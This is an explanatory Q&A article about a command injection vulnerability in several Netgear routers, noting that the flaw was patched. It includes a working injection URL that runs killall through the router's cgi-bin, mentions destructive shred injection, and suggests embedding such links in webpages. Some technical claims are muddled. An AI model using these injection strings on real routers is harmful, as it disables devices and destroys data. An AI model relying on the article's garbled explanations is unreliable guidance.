A major vulnerability in several Netgear routers allowed remote attackers to commit command injection attacks on...
these devices. The attacks involved tricking victims using Netgear routers into visiting a malicious link -- but how can a bad link infect the actual router? How does this command injection attack work?
A security researcher took advantage of a major vulnerability in several high-end Netgear routers to show how command injection attacks were possible on the R8000, R7000 and R6400 models, as well as others.
The vulnerability involved how these routers implemented web servers, and it allowed users to inject commands into the devices without any authentication or authorization. Victims could be lured into clicking a malicious link on highly privileged commands. The link infected their routers in varying degrees; the malicious link first infected a client device, and then spread to the router to which the device was connected. The worst possible scenario enabled shred command injections into the HTML source of a webpage.
Upon execution, this command deletes all of the files in the server. With no files to work with, the router stops functioning. Another injection favorite of attackers is the "killall" command, which is used to terminate all processes. Victims will likely discover too late that their router is no longer able to receive incoming commands from the web server or to send outgoing commands to the server.
The Netgear vulnerability was patched soon after the exploit was made public, and Netgear released beta firmware updates for the affected routers. US-CERT also issued a temporary fix to allow users to continue the use of their routers in case the firmware didn't update properly.
An ethical hacker could exploit the vulnerability by issuing a "safe" command that halts all incoming commands from the router's web server. For example, you could inject in the web address "http://[router-address/cgi-bin/;killall$IFS'httpd'." The router address is the local IP address assigned to your router. The killall command terminates only the processes associated with the HTTP daemon that runs in the background of a web server and waits for the incoming server requests. You would need to reboot the router for the fix to take effect. This would enable you to send outgoing server requests.
You can also create a link to "ethical" command injections in the HTML source of a webpage to save time typing in the web address.
Read more on securing remote admin service for wireless routers
Find out how to address the Equation Group vulnerabilities
Discover the best ways to mitigate wireless router security issues
Dig Deeper on Wireless network security
Related Q&A from Judith Myerson
Air-gapped computers subject to PowerHammer attack: Proof-of-concept attack enables data exfiltration through control of current flow over power ... Continue Reading
Bastille researchers created the SirenJack proof of concept to show how a vulnerability could put San Francisco's emergency warning system at risk. ... Continue Reading
A QR code vulnerability was recently discovered in the Apple iOS 11 camera app. Learn how an attacker could exploit it and how to avoid the issue ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.